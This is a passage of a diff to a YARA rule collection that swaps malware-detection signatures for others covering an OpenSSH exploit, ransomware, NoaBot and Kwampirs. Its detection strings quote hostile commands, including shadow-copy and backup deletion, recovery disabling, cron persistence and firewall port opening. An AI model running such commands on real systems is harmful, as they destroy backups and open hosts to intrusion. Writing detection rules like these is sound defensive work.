source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/exploit_cve_2024_6387.yara#L2-L38" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + hash = "62b06a6c30a0c891c2246ff87c0ad9ae03d2123601ba5331d6348c43b38d185e" + logic_hash = "d43a77c2690b5e01639590bc31fa64fa36b1da5efd3cc0761be7369ce80e4253" score = 75 - quality = 50 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.BitterRAT" + quality = 85 + tags = "CVE-2024-6387, FILE" + version = "1.0" strings: - $s1 = "getfile" fullword wide - $s2 = "getfolder" fullword wide - $s3 = "winmgmts://./root/default:StdRegProv" fullword wide - $s4 = "winlog" fullword wide - $s5 = "winprt" fullword wide - $s6 = "c:\\intel\\" fullword ascii - $s7 = "AXE: #" fullword ascii - $s8 = "Bld: %s.%s.%s" fullword ascii - $s9 = "53656C656374202A2066726F6D2057696E33325F436F6D707574657253797374656D" wide nocase - $pdb1 = "\\28NovDwn\\Release\\28NovDwn.pdb" ascii - $pdb2 = "\\Shellcode\\Release\\Shellcode.pdb" ascii + $a0 = "Attempting exploitation with glibc base: 0x%lx" ascii wide fullword + $a1 = "Attempt %d of 20000" ascii wide fullword + $a2 = "Failed to establish connection, attempt %d" ascii wide fullword + $a3 = "SSH handshake failed, attempt %d" ascii wide fullword + $a4 = "Possible exploitation success on attempt %d with glibc base 0x%lx!" ascii wide fullword + $a5 = "Received SSH version: %s" ascii wide fullword + $a6 = "Connection closed while receiving SSH version" ascii wide fullword + $a7 = "Received KEX_INIT (%zd bytes)" ascii wide fullword + $a8 = "Connection closed while receiving KEX_INIT" ascii wide fullword + $a9 = "Estimated parsing time: %.6f seconds" ascii wide fullword + $a10 = "Received response after exploit attempt (%zd bytes)" ascii wide fullword + $a11 = "Possible hit on 'large' race window" ascii wide fullword + $a12 = "Connection closed by server - possible successful exploitation" ascii wide fullword + $a13 = "No immediate response from server - possible successful exploitation" ascii wide fullword + $a14 = "Attempt %d of 10000" ascii wide fullword condition: - uint16(0)==0x5a4d and (7 of ($*) or (4 of ($s*) and 1 of ($pdb*))) + ( filesize <5MB) and ( uint32be(0)==0x7F454C46) and (4 of ($a*)) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Tjkeylogger : FILE +rule CRAIU_Crashstrike : FILE { meta: - description = "TJKeylogger payload" - author = "ditekSHen" - id = "6aaa11b2-3734-5538-b593-f5276f3acc72" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L553-L567" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "52d98a6f5a2cfc6717b7097b4e70c1e813851222f9f06ae74be4e5703b0b0dde" + description = "Crowdstrike C-00000???-*.sys files" + author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" + id = "9a5168c4-0a7f-5269-bafa-728f123a04c5" + date = "2024-07-19" + modified = "2024-07-19" + reference = "https://en.wikipedia.org/wiki/July_2024_global_cyber_outages" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/20240719_crashstrike.yara#L2-L26" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + hash = "9d001ef3206fe2f955095244e6103ad7f8f318c7c5cbd91a0dd1f33e4217fcb2" + logic_hash = "9a8dacf9d95042851073c40f5eab2a6aff61be3a576363ffcd8c21aaec7f0b96" score = 75 - quality = 75 + quality = 85 tags = "FILE" + version = "1.0" strings: - $s1 = "TJKeyLogger" fullword ascii - $s2 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii - $s3 = "\\Passwords.txt" ascii - $s4 = "TJKeyLogItem" fullword ascii - $s5 = "TJKeyAsyncLog" fullword ascii - $s6 = "FM_GETDSKLST" fullword ascii - $s7 = "KL_GETMODE" fullword ascii + $a1 = "000E0A000E0GHijklMNOPqRSTUVwX" + $a2 = "AbCDEfghIjklMNoPqrstuV" condition: - uint16(0)==0x5a4d and 5 of them + ( filesize <60KB) and ( uint32(0)==0xaaaaaaaa) and ( all of them ) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_W1RAT : FILE +rule CRAIU_Crime_Chaos_Ransomware_Gen : FILE { meta: - description = "W1 RAT payload" - author = "ditekSHen" - id = "d5841bc0-97e7-575e-91f6-d264f507a8b5" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L569-L585" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "84b9a2e309ed9ab0fb8343d941585356d23348683073d0a37fc7194f58a43a0e" + description = "Chaos ransomware generic strings" + author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" + id = "e909f7e4-50c2-54a6-8274-9ef92f95bf93" + date = "2024-05-27" + modified = "2024-05-28" + reference = "https://blog.sonicwall.com/en-us/2024/05/politically-charged-ransomware-weaponized-as-a-file-destroyer/" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_chaos_ransomware.yara#L2-L39" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + hash = "524a898e18999ceac864dbac5b85fa2f14392e389b3c32f77d58e2a89cdf01c4" + logic_hash = "7d2e1c9178d5bf360cebc90056bbdae6a11729b1b3c5e963c522a29fd7ba7a3e" score = 75 - quality = 75 + quality = 60 tags = "FILE" + version = "1.0" strings: - $s1 = "/c /Ox /Fa\"%s/%s.asm\" /Fo\"%s/%s.obj\" \"%s/%s.%s\"" ascii - $s2 = "this->piProcInfo.hProcess" fullword ascii - $s3 = "index >= 0 && index < this->reg_tab->GetLen()" fullword ascii - $s4 = "strcpy(log_font.lfFaceName,\"%s\");" fullword ascii - $s5 = "WorkShop -- [%s]" fullword ascii - $s6 = "HeaderFile.cpp" fullword ascii - $s7 = "WndLog.cpp" fullword ascii - $s8 = "assertion fail \"%s\" at file=%s line=%d" fullword ascii - $s9 = "Stdin pipe creation failed" fullword ascii + $a0 = "<Exponent>AQAB</Exponent>" ascii wide fullword + $a2 = "<EncryptedKey>" ascii wide fullword + $a15 = "vssadmin delete shadows /all /quiet & wmic shadowcopy delete" ascii wide fullword + $a16 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" ascii wide fullword + $a17 = "wbadmin delete catalog -quiet" ascii wide fullword + $a18 = "C:\\Users\\" ascii wide fullword + $a22 = "/9j/4AAQSkZJRgABAQAAAQABAAD/4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAQ4B4ADAREAAhEBAxEB/8QAHwAAAAYDAQEBAAAAAAAAAAAABAUGBwgJAgMKAQAL/8QAgRAAAQIDBQQIAwcCAgQIAAI7AQIRAwQhAAUGMUEHElFhCBMicYGRofCxwdEJFCMyQuHxFVIzYhYkQ3IKFzRTY4KSshglRHOi0uIZJlRkg5PCJzU2RVZYdJaXo9PWGkZHVVeEprO1KDllZ3V2eIaHlJWktLbDxtTV1zd3xMVmp8f" ascii wide fullword + $a24 = "17CqMQFeuB3NTzJ" ascii wide fullword + $a25 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" ascii wide fullword + $a26 = "7z459ajrk722yn8c5j4fg" ascii wide + $a27 = "2X28tfRmWaPyPQgvoHV" ascii wide + $a28 = "1qw0ll8p9m8uezhqhyd" ascii wide + $b11 = "\\Saved Games" ascii wide fullword condition: - ( uint16(0)==0x5a4d and 6 of ($s*)) or ( all of them ) + ( filesize <9MB) and ( uint16(0)==0x5a4d) and ((3 of them )) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Raccoon : FILE +rule CRAIU_Crime_Lockbit3_Ransomware : FILE { meta: - description = "Raccoon stealer payload" - author = "ditekSHen" - id = "5ebef663-623c-592e-b69a-f620492f0cc1" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L587-L606" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "258481982d20d229506f442a5a205fdc05f6ac4399f3a0665860e6529c30943b" + description = "Generic LockBit detection, also catches the version used in attacks in Indonesia." + author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro" + id = "167788a4-a610-5770-9f51-aa4cc4d3d350" + date = "2024-07-03" + modified = "2024-07-03" + reference = "https://www.bleepingcomputer.com/news/security/meet-brain-cipher-the-new-ransomware-behind-indonesia-data-center-attack/" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_lockbit3_ransomware.yara#L2-L32" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + hash = "eb82946fa0de261e92f8f60aa878c9fef9ebb34fdababa66995403b110118b12" + hash = "6e07da23603fbe5b26755df5b8fec19cadf1f7001b1558ea4f12e20271263417" + logic_hash = "84efb899315379d85a03959359f89fbcb97cbb6477f1ec439380a4d15fed4f53" score = 75 - quality = 50 + quality = 85 tags = "FILE" + version = "1.1" strings: - $s1 = "inetcomm server passwords" fullword wide - $s2 = "content-disposition: form-data; name=\"file\"; filename=\"data.zip\"" fullword ascii - $s3 = ".?AVfilesystem_error@v1@filesystem@experimental@std@@" fullword ascii - $s4 = "CredEnumerateW" fullword ascii - $s5 = "%[^:]://%[^/]%[^" fullword ascii - $s6 = "%99[^:]://%99[^/]%99[^" fullword ascii - $s7 = "Login Data" wide - $s8 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide - $x1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide - $x2 = "\\json.hpp" wide - $x3 = "Microsoft_WinInet_" fullword wide - $x4 = "Microsoft_WinInet_*" fullword wide + $a1 = {C3 8BFF53 51 6A0158 0FA2F7C1000000400F95C0 84C074090FC7F0 0FC7F2 59 5B C3 } + $a2 = {C3 6A0758 33C90FA2F7C3000004000F95C0 84C074090FC7F8 0FC7FA 59 5B C3 } + $a3 = {C3 0F31 8BC8 C1C90D 0F31 8BD0 C1C20D 8BC1 59 5B C3 } + $a4 = {55 8BEC 51 52 56 33C0 8B550C 8B7508 AC 33C9 B930000000 8D0C4D01000000 02F1 2AF1 33C9 B906000000 8D0C4D01000000 D3CA 03D0 90 85C0} + $a5 = {E9 ?? ?? ?? ?? 6683F841 720C 6683F846 7706 6683E837 EB26 6683F861 720C 6683F866 7706 6683E857 EB14 6683F830 720C 6683F839 7706 6683E830 EB} + $a6 = {5D 8BC3 5F 5E 5B 5D C20C00 90 55 8BEC 53 56 57 33C0 8B5D14 33C9 33D2 8B750C 8B7D08 85F6 } condition: - uint16(0)==0x5a4d and ((3 of ($x*) and 2 of ($s*)) or (4 of ($s*) and 1 of ($x*))) + ( filesize <1MB) and ( uint16(0)==0x5a4d) and (2 of them ) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Tefosteal : FILE +rule CRAIU_Susp_Ios_Shutdown { meta: - description = "Tefosteal payload" - author = "ditekSHen" - id = "56646933-3ed3-5b77-9135-993b57603490" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L653-L674" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a350863270cbe3349f271e55d66a2ebdd6406e8d122c11071de74a774eb77ebf" - score = 75 - quality = 71 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Tefosteal" + description = "Detect shutdown.log files from sysdiags with suspicious entries" + author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" + id = "08aa1fb9-7af0-515a-91a8-09ed35e48155" + date = "2023-12-28" + modified = "2024-03-05" + reference = "https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/susp_ios_shutdown.yara#L2-L25" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + logic_hash = "936101f2dddb73f6dda41be47d775199c458aa4fecdcf348ed479da620343ea1" + score = 65 + quality = 85 + tags = "" + version = "1.0" + tlp = "TLP:CLEAR" strings: - $s1 = "netsh wlan show networks mode=bssid" nocase fullword wide - $s2 = "LoginCredentialService.GetLoginCredentials$" ascii - $s3 = "DefaultLoginCredentials.LoginEventUsrPw$" ascii - $s4 = "SEC_E_NO_KERB_KEY" wide - $s5 = "TList<System.Zip.TZipHeader>." ascii - $s6 = "_Password.txt" fullword wide nocase - $s7 = "_Cookies.txt" fullword wide nocase - $f1 = "\\InfoPC\\BSSID.txt" wide - $f2 = "\\Files\\Telegram\\" wide - $f3 = "\\InfoPC\\Screenshot.png" wide - $f4 = "\\InfoPC\\Systeminfo.txt" wide - $f5 = "\\Steam\\config" wide - $f6 = "\\delete.vbs" wide + $a1 = "these clients are still here:" + $b1 = "/private/var/db/" + $b2 = "/private/var/tmp/" + $c1 = "After " condition: - uint16(0)==0x5a4d and 4 of ($s*) and 2 of ($f*) + ($c1 at 0) and $a1 and ( any of ($b*)) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Cryptostealergo : FILE +rule CRAIU_Crime_Noabot : FILE { meta: - description = "CryptoStealerGo payload" - author = "ditekSHen" - id = "83886aeb-af7e-564c-989a-fb7d955814e2" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L676-L692" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0050be7522e7d89cb9688e63fdca11d24baa74aa858e8c19ee7b4658518536b6" + description = "Noabot is a clone of Mirai" + author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" + id = "8626783b-898c-587d-9b23-c8c9111cde66" + date = "2024-01-11" + modified = "2024-01-11" + reference = "https://www.akamai.com/blog/security-research/mirai-based-noabot-crypto-mining" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_noabot.yara#L2-L57" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + hash = "1603202a9115b83224233697f2ca1d36fef60113b94a73a15afed79a459aacc3" + hash = "16a28951acfe78b81046bfedb0b489efb4c9d3d1d3b8475c39b93cd5105dc866" + hash = "3da983ef3580a4b1b3b041cd991019b900f7995791c0acb32035ac5706085a63" + hash = "648a4f33b2c268523378929179af529bc064538326a1202dcdfcd9ee12ae8f6c" + hash = "829b3c298f7003f49986fb26920f7972e52982651ae6127c6e8e219a86f46890" + hash = "c723a221cff37a700e0e3b9dc5f69cdd6a4cc82502ac7c144d6ca1eaf963e800" + hash = "c8d3c0b87176b7f8d5667d479cb40d1b9f030d30afe588826254f26ebb4ac58e" + logic_hash = "51c63f45f891ee80c5e8428575f12cb5881665cb9fe26018d173335db0f02012" score = 75 - quality = 75 + quality = 85 tags = "FILE" + version = "1.1" strings: - $s1 = "Go build ID: \"" ascii - $s2 = "file_upload.go" ascii - $s3 = "grequests.FileUpload" ascii - $s4 = "runtime.newproc" ascii - $s5 = "credit_cards" ascii - $s6 = "zip.(*fileWriter).Write" ascii - $s7 = "autofill_" ascii - $s8 = "XFxVc2VyIERhdGFcXA==" ascii - $s9 = "XFxBcHBEYXRhXFxMb2NhbFxc" ascii + $a1a = "(crontab -l; printf '@reboot %s noa" + $a1b = "(crontab -l; printf '@reboot %s \"%s\" noa" + $a2 = {40 6D 61 67 69 63 40 [1-8] 6E 6F 61 [1-8] 0A 0A 49 20 61 69 6E 74 20 79 6F 75 72 20 61 76} + $a3 = {31 32 33 34 35 36 [1-8] 41 64 6D 69 6E 21 40 23 [1-8] 7A 68 61 6E 67 6A 69 65 31 32 33 [1-8] 43 75 6D 75 6C 75 73 4C 69 6E 75 78 21 [1-8] 61 62 63 31 32 33 24 [1-8] 77 65 62 40 31 32 33 [1-8] 6D 70 69 75 73 65 72 [1-8] 61 74 75 61 6C 69 7A 61} + $a4 = "HACKED: %s:%d:%s:%s" + $a5 = {25 64 7C 25 64 00 31 76 57 3F 3E 55 00 26 25 2423 00 67 76 64 64 60 78 65 73 00 00 26 25 24 00} + $b1 = "ufw allow 24816" + $b2 = "iptables -I INPUT -p tcp --dport 24816 -j ACCEPT" + $b3 = "iptables -I OUTPUT -p tcp --dport 24816 -j ACCEPT" + $b4 = "firewall-cmd --permanent --add-port 24816/tcp" + $b5 = "magicPussyMommy" + $c1 = "SOCKET_CREATING_ERROR SCANNER" + $c2 = "SOCKET_CREATING_ERROR RECYCLE" condition: - uint16(0)==0x5a4d and 8 of them + filesize <10MB and ( uint32(0)==0x464c457f) and (( any of ($a*)) or ( all of ($b*)) or ( all of ($c*))) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_M00Nd3V : FILE +rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Dropperandmainpayload : KWAMPIRS { meta: - description = "M00nD3v keylogger payload" - author = "ditekSHen" - id = "4000f55d-e072-50b6-b6ee-72cefc0ec53f" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L694-L715" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "68a0888da3b114dc895fe18a3d03b2b88d140fbf82b888f7a031b9364d01aabf" + description = "Kwampirs dropper and main payload components" + author = "Symantec" + id = "5a40a5e7-0b98-5f6e-a808-493676b57cda" + date = "2018-04-23" + modified = "2020-03-31" + reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L2-L80" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + logic_hash = "40e197f4278a2d14e8fe1359676558319e86728f7e61ddf612bcc894c311d53a" score = 75 - quality = 75 - tags = "FILE" + quality = 85 + tags = "KWAMPIRS" + family = "Kwampirs" strings: - $s1 = "M00nD3v Stub" ascii wide - $s2 = "M00nD3v{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" fullword wide - $s3 = "Anti-Keylogger Elite" wide - $s4 = "/C TASKKILL /F /IM" wide - $s5 = "echo.>{0}:Zone.Identifier" fullword wide - $s6 = "> Nul & Del \"{0}\" & start \"\" \"{1}.exe\"" wide - $s7 = "> Nul & start \"\" \"{1}.exe\"" wide - $s8 = "Stealer" fullword wide - $s9 = "{0}{0}++++++++++++{1} {2}++++++++++++{0}{0}" wide - $s10 = "{4}Application: {3}{4}URL: {0}{4}Username: {1}{4}Password: {2}{4}" wide - $s11 = "encrypted_key\":\"(?<Key>.+?)\"" wide - $s12 = "Botkiller" fullword ascii - $s13 = "AVKiller" fullword ascii - $s14 = "get_pnlPawns" fullword ascii + $pubkey = { + 06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00 + 01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5 + 97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9 + E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31 + 48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A + CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11 + 56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33 + 02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2 + 9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28 + 4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B + 4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71 + 6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9 + 59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36 + EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82 + C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6 + FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D + 90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF + F7 E4 0C B3 + } + $network_xor_key = { + B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38 + C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0 + 91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58 + C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68 + CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B + 8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02 + D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9 + 62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B + 10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E + BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83 + 3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B + A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91 + 75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C + A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7 + 45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F + DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33 + } + $decrypt_string = { + 85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74 + 4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9 + 40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51 + E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB + 74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38 + 40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3 + 32 C0 C3 + } + $init_strings = { + 55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00 + 00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8 + B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02 + 10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02 + 10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00 + 00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06 + } condition: - ( uint16(0)==0x5a4d and 6 of them ) or (9 of them ) + (2 of them ) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Vssdestroy : FILE +rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Shamoon_Code : FILE { meta: - description = "VSSDestroy/Matrix ransomware payload" - author = "ditekSHen" - id = "734ece56-b993-5b44-ae15-f673fabfe8ad" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L717-L740" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "24bfd32580f784440252d629a7ab86b84a570ded34409940616be2a89bf73088" + description = "Kwampirs and Shamoon common code" + author = "FBI / cywatch@fbi.gov" + id = "0d403b3b-a5a8-5ac6-a12d-7181a1ad11b3" + date = "2020-01-14" + modified = "2020-03-31" + reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L85-L105" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + logic_hash = "5ab949280be87d242ad2843dee001eee5a338e266ef52da55883f7c77e66cf5b" score = 75 - quality = 75 + quality = 85 tags = "FILE" - snort_sid = "920008-920009" - clamav_sig = "MALWARE.Win.Ransomware.VSSDestroy" + yara_version = "3.7.0" strings: - $o1 = "[SHARESSCAN]" wide - $o2 = "[LDRIVESSCAN]" wide - $o3 = "[LOGSAVED]" wide - $o4 = "[LPROGRESS]" wide - $o5 = "[FINISHSAVED]" wide - $o6 = "[ALL_LOCAL_KID]" wide - $o7 = "[DIRSCAN" wide - $o8 = "[GENKEY]" wide - $s1 = "\\cmd.exe" nocase wide - $s2 = "/C powershell \"" nocase wide - $s3 = "%COMPUTERNAME%" wide - $s4 = "%USERNAME%" wide - $s5 = "Error loading Socket interface (ws2_32.dll)!" wide - $s6 = "Old file list dump found. Want to load it? (y/n):" fullword wide + $memcpy = { 56 8B F0 85 FF 74 19 85 D2 74 15 8B CF 85 F6 74 0B 2B D7 8A 04 0A 88 01 41 4E 75 F7 8B C7 5E C3 33 C0 5E C3 } + $strlenW = { 33 C0 85 C9 74 17 80 3C 41 00 75 07 80 7C 41 01 00 74 0A 3D 00 94 35 77 73 03 40 EB E9 C3 } + $strcmp = { 85 C0 75 07 85 D2 75 40 B0 01 C3 85 D2 74 39 66 83 38 00 56 74 24 0F B7 0A 66 85 C9 74 16 + 66 8B 30 83 C2 02 83 C0 02 66 3B F1 75 18 66 83 38 00 75 E4 EB 06 66 83 38 00 75 0A 66 83 3A 00 75 04 B0 + 01 5E C3 32 C0 5E C3 32 C0 C3 } condition: - ( uint16(0)==0x5a4d and 4 of ($o*) and 3 of ($s*)) or (5 of ($o*) and 4 of ($s*)) + ( uint16(0)==0x5a4d) and (1 of them ) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Goldenaxe : FILE +rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Installer : FILE { meta: - description = "GoldenAxe ransomware payload" - author = "ditekSHen" - id = "23874106-dbbb-5cb2-b61a-1661d8e2d868" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L742-L763" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "6dfd88ce65acdfed4749e3b817b317c3c514ea42f892a7f5f95853c148507918" + description = "Kwampirs installer xor keys and Unicode string length routine" + author = "FBI / cywatch@fbi.gov" + id = "8c80d0d5-8c65-5cef-ad86-b38f4d671bec" + date = "2020-01-14" + modified = "2020-03-31" + reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L109-L127" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + logic_hash = "ac9c3ba7188cbbe736ff81b41086fdc874ac24ae83d3cec390907f8edd0a0ce5" score = 75 - quality = 75 + quality = 85 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.GoldenAxe" + yara_version = "3.7.0" strings: - $s1 = "Go build ID: " 